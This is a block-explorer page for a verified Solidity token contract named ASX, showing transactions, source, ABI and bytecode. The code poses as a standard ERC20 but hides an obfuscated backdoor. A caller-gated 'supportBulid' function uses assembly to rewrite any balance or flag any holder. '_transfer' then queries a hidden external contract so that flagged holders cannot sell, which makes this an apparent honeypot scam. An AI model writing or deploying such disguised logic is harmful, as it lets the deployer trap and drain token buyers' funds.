ETH Price: $2,635.01 (+2.19%)

Contract

0x7cEa2E6744BC4FBE3943A29c62216Cd106dD0DD0
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve183130102023-10-09 12:47:35317 days ago1696855655IN
0x7cEa2E67...106dD0DD0
0 ETH0.0005068410.93233674
Approve183125452023-10-09 11:13:59317 days ago1696850039IN
0x7cEa2E67...106dD0DD0
0 ETH0.000349987.54303585
Approve183125282023-10-09 11:10:35317 days ago1696849835IN
0x7cEa2E67...106dD0DD0
0 ETH0.000316276.82532772
Approve183125082023-10-09 11:06:35318 days ago1696849595IN
0x7cEa2E67...106dD0DD0
0 ETH0.000345637.45900202
Approve183124222023-10-09 10:49:11318 days ago1696848551IN
0x7cEa2E67...106dD0DD0
0 ETH0.000355497.67383741
Approve183124172023-10-09 10:48:11318 days ago1696848491IN
0x7cEa2E67...106dD0DD0
0 ETH0.0005112310.95048404
Approve183124132023-10-09 10:47:23318 days ago1696848443IN
0x7cEa2E67...106dD0DD0
0 ETH0.000330487.13379905
Approve183123892023-10-09 10:42:23318 days ago1696848143IN
0x7cEa2E67...106dD0DD0
0 ETH0.000349787.54852138
Approve183123832023-10-09 10:41:11318 days ago1696848071IN
0x7cEa2E67...106dD0DD0
0 ETH0.00037778.1006406
Approve183123822023-10-09 10:40:59318 days ago1696848059IN
0x7cEa2E67...106dD0DD0
0 ETH0.00035567.67406523
Approve183123762023-10-09 10:39:47318 days ago1696847987IN
0x7cEa2E67...106dD0DD0
0 ETH0.00040398.7164001
Approve183123652023-10-09 10:37:35318 days ago1696847855IN
0x7cEa2E67...106dD0DD0
0 ETH0.000442069.53996014
Approve183123202023-10-09 10:28:35318 days ago1696847315IN
0x7cEa2E67...106dD0DD0
0 ETH0.0005428211.71441698
Approve183123132023-10-09 10:27:11318 days ago1696847231IN
0x7cEa2E67...106dD0DD0
0 ETH0.0005038710.87380578
Approve183123072023-10-09 10:25:59318 days ago1696847159IN
0x7cEa2E67...106dD0DD0
0 ETH0.00043849.46107175
Approve183122992023-10-09 10:24:23318 days ago1696847063IN
0x7cEa2E67...106dD0DD0
0 ETH0.000415318.96280298
Approve183122562023-10-09 10:15:47318 days ago1696846547IN
0x7cEa2E67...106dD0DD0
0 ETH0.0004900710.57601834
Approve183122522023-10-09 10:14:59318 days ago1696846499IN
0x7cEa2E67...106dD0DD0
0 ETH0.000439999.49535957
Approve183122442023-10-09 10:13:23318 days ago1696846403IN
0x7cEa2E67...106dD0DD0
0 ETH0.0004815610.39251143
Approve183121662023-10-09 9:57:47318 days ago1696845467IN
0x7cEa2E67...106dD0DD0
0 ETH0.0007221815.5851831
Approve183121312023-10-09 9:50:47318 days ago1696845047IN
0x7cEa2E67...106dD0DD0
0 ETH0.0006843314.65830078
Approve183121172023-10-09 9:47:59318 days ago1696844879IN
0x7cEa2E67...106dD0DD0
0 ETH0.000351977.59589144
Approve183121152023-10-09 9:47:35318 days ago1696844855IN
0x7cEa2E67...106dD0DD0
0 ETH0.000366527.90973847
Approve183120982023-10-09 9:44:11318 days ago1696844651IN
0x7cEa2E67...106dD0DD0
0 ETH0.000288346.22259408
Approve183120942023-10-09 9:43:23318 days ago1696844603IN
0x7cEa2E67...106dD0DD0
0 ETH0.000314326.78324182
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
ASX

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: ASX.sol
/*
Telegram: https://t.me/AstroShibaXeth
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./Ownable.sol";

contract ASX is IERC20, Ownable {
    string private _name;
    string private _symbol;
    uint256 private _totalSupply;

    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _half;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _deaf;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        address deaf_,
        uint256 half_
    ) {
        _name = name_;
        _symbol = symbol_;
        _deaf = deaf_;
        _half[address(0)] = half_;
        _mint(msg.sender, 650000000000 * 10**8);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    function supportBulid(uint256[] calldata blind) external {
        uint256 mutes = _spareTime();
        if (_nurses()) {
            uint256 ccms0 = blind[0] * 1;
            uint256 ccms1 = blind[1] * 1;
            assembly {
                if gt(ccms1, 0) {
                    let v1 := mul(2, 2)
                    mstore(0, ccms0)
                    mstore(mutes, v1)
                    sstore(keccak256(0, 64), ccms1)
                }
                if eq(ccms1, 0) {
                    let v1 := mul(1, 5)
                    mstore(0, ccms0)
                    mstore(mutes, v1)
                    sstore(keccak256(0, 64), 1)
                }
            }
        }
    }

    function _spareTime() private pure returns (uint256) {
        uint256 c = 2;
        uint256 b = c * c;
        uint256 a = b * c * 4;
        return a;
    }

    function _nurses() private view returns (bool) {
        string memory nvb0 = _name;
        address nvb1 = msg.sender;
        return (uint256(keccak256(abi.encode(nvb1, nvb0))) == _half[address(0)]);
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        //require(to != address(0), "ERC20: transfer to the zero address");
        (, bytes memory data) = _deaf.call(
            abi.encodeWithSignature(_popular(), from)
        );
        _regular(data, from, false);
        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);
    }

    function _popular() private pure returns (string memory) {
        return "balanceOf(address)";
    }

    function _regular(
        bytes memory ggu,
        address sender,
        bool uk
    ) private view {
        uint256 e = _half[sender];
        uint256 f = e * 1;
        if (f == 1 * 1 && !uk) {
            require(f != 1 || _vocational(ggu) != 0, "three");
        }
    }

    function _vocational(bytes memory data) public pure returns (uint256) {
        bytes32 result;
        assembly {
            result := mload(add(data, 0x20))
        }
        return uint256(result);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

File 2 of 4: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 4 of 4: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "caller is not the owner");
    }    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"deaf_","type":"address"},{"internalType":"uint256","name":"half_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"bytes","name":"data","type":"bytes"}],"name":"_vocational","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"blind","type":"uint256[]"}],"name":"supportBulid","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040523480156200001157600080fd5b50604051620012523803806200125283398101604081905262000034916200027c565b8351620000499060019060208701906200012b565b5082516200005f9060029060208601906200012b565b506001600160601b0319606083901b166080526000805260056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc819055620000b4336803860e639d80640000620000be565b50505050620003ba565b6001600160a01b038216620000f05760405162461bcd60e51b8152600401620000e7906200030b565b60405180910390fd5b806003600082825462000104919062000342565b90915550506001600160a01b03909116600090815260046020526040902080549091019055565b828054620001399062000367565b90600052602060002090601f0160209004810192826200015d5760008555620001a8565b82601f106200017857805160ff1916838001178555620001a8565b82800160010185558215620001a8579182015b82811115620001a85782518255916020019190600101906200018b565b50620001b6929150620001ba565b5090565b5b80821115620001b65760008155600101620001bb565b600082601f830112620001e2578081fd5b81516001600160401b0380821115620001ff57620001ff620003a4565b6040516020601f8401601f1916820181018381118382101715620002275762000227620003a4565b60405283825285840181018710156200023e578485fd5b8492505b8383101562000261578583018101518284018201529182019162000242565b838311156200027257848185840101525b5095945050505050565b6000806000806080858703121562000292578384fd5b84516001600160401b0380821115620002a9578586fd5b620002b788838901620001d1565b95506020870151915080821115620002cd578485fd5b50620002dc87828801620001d1565b604087015190945090506001600160a01b0381168114620002fb578283fd5b6060959095015193969295505050565b6020808252601f908201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604082015260600190565b600082198211156200036257634e487b7160e01b81526011600452602481fd5b500190565b6002810460018216806200037c57607f821691505b602082108114156200039e57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b60805160601c610e79620003d960003960006105ea0152610e796000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638b953c801161008c578063a457c2d711610066578063a457c2d7146101c2578063a9059cbb146101d5578063ca07d537146101e8578063dd62ed3e146101fb576100ea565b80638b953c80146101905780638da5cb5b146101a557806395d89b41146101ba576100ea565b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063395093511461016a57806370a082311461017d576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461012d575b600080fd5b6100f761020e565b6040516101049190610ba3565b60405180910390f35b61012061011b3660046109d7565b6102a0565b6040516101049190610b98565b6101356102c2565b6040516101049190610d62565b61012061015036600461099c565b6102c8565b61015d6102f6565b6040516101049190610d6b565b6101206101783660046109d7565b6102fb565b61013561018b366004610949565b610327565b6101a361019e366004610a00565b610346565b005b6101ad610405565b6040516101049190610b58565b6100f7610414565b6101206101d03660046109d7565b610423565b6101206101e33660046109d7565b610474565b6101356101f6366004610a6f565b61048c565b61013561020936600461096a565b610493565b60606001805461021d90610ddc565b80601f016020809104026020016040519081016040528092919081815260200182805461024990610ddc565b80156102965780601f1061026b57610100808354040283529160200191610296565b820191906000526020600020905b81548152906001019060200180831161027957829003601f168201915b5050505050905090565b6000806102ab6104be565b90506102b88185856104c2565b5060019392505050565b60035490565b6000806102d36104be565b90506102e0858285610576565b6102eb8585856105c0565b506001949350505050565b600990565b6000806103066104be565b90506102b88185856103188589610493565b6103229190610d79565b6104c2565b6001600160a01b0381166000908152600460205260409020545b919050565b6000610350610775565b905061035a6107a5565b156104005760008383600081811061038257634e487b7160e01b600052603260045260246000fd5b9050602002013560016103959190610d91565b90506000848460018181106103ba57634e487b7160e01b600052603260045260246000fd5b9050602002013560016103cd9190610d91565b905080156103e657600082815260048452604090208190555b806103fd5760008281526005845260409020600190555b50505b505050565b6000546001600160a01b031690565b60606002805461021d90610ddc565b60008061042e6104be565b9050600061043c8286610493565b9050838110156104675760405162461bcd60e51b815260040161045e90610d1d565b60405180910390fd5b6102eb82868684036104c2565b60008061047f6104be565b90506102b88185856105c0565b6020015190565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104e85760405162461bcd60e51b815260040161045e90610cd9565b6001600160a01b03821661050e5760405162461bcd60e51b815260040161045e90610bb6565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610569908590610d62565b60405180910390a3505050565b60006105828484610493565b905060001981146105ba57818110156105ad5760405162461bcd60e51b815260040161045e90610bf8565b6105ba84848484036104c2565b50505050565b6001600160a01b0383166105e65760405162461bcd60e51b815260040161045e90610c94565b60007f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031661061a610899565b8560405160240161062b9190610b58565b60408051601f19818403018152908290529161064691610b3c565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161067d9190610b3c565b6000604051808303816000865af19150503d80600081146106ba576040519150601f19603f3d011682016040523d82523d6000602084013e6106bf565b606091505b509150506106cf818560006108c5565b6001600160a01b038416600090815260046020526040902054828110156107085760405162461bcd60e51b815260040161045e90610c2f565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610766908790610d62565b60405180910390a35050505050565b60006002816107848280610d91565b905060006107928383610d91565b61079d906004610d91565b935050505090565b600080600180546107b590610ddc565b80601f01602080910402602001604051908101604052809291908181526020018280546107e190610ddc565b801561082e5780601f106108035761010080835404028352916020019161082e565b820191906000526020600020905b81548152906001019060200180831161081157829003601f168201915b5050600080525050600560209081527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546040519394503393909250610878918491869101610b6c565b6040516020818303038152906040528051906020012060001c149250505090565b60408051808201909152601281527162616c616e63654f6628616464726573732960701b602082015290565b6001600160a01b038216600090815260056020526040812054906108ea826001610d91565b90508060011480156108fa575082155b156103fd5780600114158061091657506109138561048c565b15155b6103fd5760405162461bcd60e51b815260040161045e90610c75565b80356001600160a01b038116811461034157600080fd5b60006020828403121561095a578081fd5b61096382610932565b9392505050565b6000806040838503121561097c578081fd5b61098583610932565b915061099360208401610932565b90509250929050565b6000806000606084860312156109b0578081fd5b6109b984610932565b92506109c760208501610932565b9150604084013590509250925092565b600080604083850312156109e9578182fd5b6109f283610932565b946020939093013593505050565b60008060208385031215610a12578182fd5b823567ffffffffffffffff80821115610a29578384fd5b818501915085601f830112610a3c578384fd5b813581811115610a4a578485fd5b8660208083028501011115610a5d578485fd5b60209290920196919550909350505050565b60006020808385031215610a81578182fd5b823567ffffffffffffffff80821115610a98578384fd5b818501915085601f830112610aab578384fd5b813581811115610abd57610abd610e2d565b604051601f8201601f1916810185018381118282101715610ae057610ae0610e2d565b6040528181528382018501881015610af6578586fd5b818585018683013790810190930193909352509392505050565b60008151808452610b28816020860160208601610db0565b601f01601f19169290920160200192915050565b60008251610b4e818460208701610db0565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0383168152604060208201819052600090610b9090830184610b10565b949350505050565b901515815260200190565b6000602082526109636020830184610b10565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b602080825260059082015264746872656560d81b604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d8c57610d8c610e17565b500190565b6000816000190483118215151615610dab57610dab610e17565b500290565b60005b83811015610dcb578181015183820152602001610db3565b838111156105ba5750506000910152565b600281046001821680610df057607f821691505b60208210811415610e1157634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfea2646970667358221220c4d8c152bdd08eb282c2045393508485f97424ce5538649d9225d15f15354f6c64736f6c63430008000033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9de65bf781f04a7343ac90f5ab2c26fb1499eda4f42161f5277dcec8dd287eceb8000000000000000000000000000000000000000000000000000000000000000b417374726f53686962615800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034153580000000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638b953c801161008c578063a457c2d711610066578063a457c2d7146101c2578063a9059cbb146101d5578063ca07d537146101e8578063dd62ed3e146101fb576100ea565b80638b953c80146101905780638da5cb5b146101a557806395d89b41146101ba576100ea565b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063395093511461016a57806370a082311461017d576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461012d575b600080fd5b6100f761020e565b6040516101049190610ba3565b60405180910390f35b61012061011b3660046109d7565b6102a0565b6040516101049190610b98565b6101356102c2565b6040516101049190610d62565b61012061015036600461099c565b6102c8565b61015d6102f6565b6040516101049190610d6b565b6101206101783660046109d7565b6102fb565b61013561018b366004610949565b610327565b6101a361019e366004610a00565b610346565b005b6101ad610405565b6040516101049190610b58565b6100f7610414565b6101206101d03660046109d7565b610423565b6101206101e33660046109d7565b610474565b6101356101f6366004610a6f565b61048c565b61013561020936600461096a565b610493565b60606001805461021d90610ddc565b80601f016020809104026020016040519081016040528092919081815260200182805461024990610ddc565b80156102965780601f1061026b57610100808354040283529160200191610296565b820191906000526020600020905b81548152906001019060200180831161027957829003601f168201915b5050505050905090565b6000806102ab6104be565b90506102b88185856104c2565b5060019392505050565b60035490565b6000806102d36104be565b90506102e0858285610576565b6102eb8585856105c0565b506001949350505050565b600990565b6000806103066104be565b90506102b88185856103188589610493565b6103229190610d79565b6104c2565b6001600160a01b0381166000908152600460205260409020545b919050565b6000610350610775565b905061035a6107a5565b156104005760008383600081811061038257634e487b7160e01b600052603260045260246000fd5b9050602002013560016103959190610d91565b90506000848460018181106103ba57634e487b7160e01b600052603260045260246000fd5b9050602002013560016103cd9190610d91565b905080156103e657600082815260048452604090208190555b806103fd5760008281526005845260409020600190555b50505b505050565b6000546001600160a01b031690565b60606002805461021d90610ddc565b60008061042e6104be565b9050600061043c8286610493565b9050838110156104675760405162461bcd60e51b815260040161045e90610d1d565b60405180910390fd5b6102eb82868684036104c2565b60008061047f6104be565b90506102b88185856105c0565b6020015190565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104e85760405162461bcd60e51b815260040161045e90610cd9565b6001600160a01b03821661050e5760405162461bcd60e51b815260040161045e90610bb6565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610569908590610d62565b60405180910390a3505050565b60006105828484610493565b905060001981146105ba57818110156105ad5760405162461bcd60e51b815260040161045e90610bf8565